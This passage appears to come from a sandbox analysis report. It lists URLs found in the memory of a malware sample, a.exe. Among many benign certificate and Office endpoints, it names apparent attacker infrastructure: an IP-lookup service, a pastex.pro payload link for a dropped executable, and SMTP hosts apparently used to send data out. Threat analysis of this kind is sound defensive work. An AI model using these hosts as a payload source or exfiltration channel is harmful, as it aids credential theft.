Source: a.exe, 0000000D.00000002.953282286.0000000002F0B000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org/
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.org4
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify.orgD
Source: a.exe, 0000000D.00000002.953221642.0000000002EFA000.00000004.00000001.sdmp	String found in binary or memory: http://api.ipify8
Source: a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: powershell.exe, 0000000A.00000002.810606306.0000000000D7C000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.cg
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: a.exe, 0000000D.00000002.953282286.0000000002F0B000.00000004.00000001.sdmp	String found in binary or memory: http://elb097307-934924932.us-east-1.elb.amazonaws.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0K
Source: a.exe, 00000001.00000002.715933897.0000000007BB0000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839238404.0000000000CA1000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0M
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: a.exe, 0000000D.00000003.896472012.0000000003F60000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: a.exe, 00000001.00000002.708980355.0000000000B2E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicm
Source: a.exe, 0000000D.00000002.956651743.000000000545A000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0A
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: http://pastex.pro
Source: a.exe, a.exe, 00000014.00000000.833793134.0000000000B22000.00000002.00020000.sdmp, mensajeria_system[1].exe.0.dr	String found in binary or memory: http://pastex.pro/b/AEmdBGcmp
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngP
Source: a.exe, 00000001.00000002.709602421.00000000027A1000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.818610560.0000000004C71000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.771982708.0000000002881000.00000004.00000001.sdmp, a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000011.00000002.841378696.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp	String found in binary or memory: http://smtp.saleforceconsults.com
Source: a.exe, 0000000D.00000002.953732965.0000000003073000.00000004.00000001.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlP
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: a.exe, 00000001.00000002.715188326.0000000006902000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.784358060.0000000005900000.00000002.00000001.sdmp, a.exe, 00000011.00000002.868430740.0000000005920000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.office.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://augloop.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cdn.entity.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://cr.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://directory.services.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.820284922.0000000004DB3000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/PesterP
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 0000000A.00000003.789977084.0000000005699000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://graph.windows.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://login.windows.local
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://management.azure.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://management.azure.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ncus-000.contentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
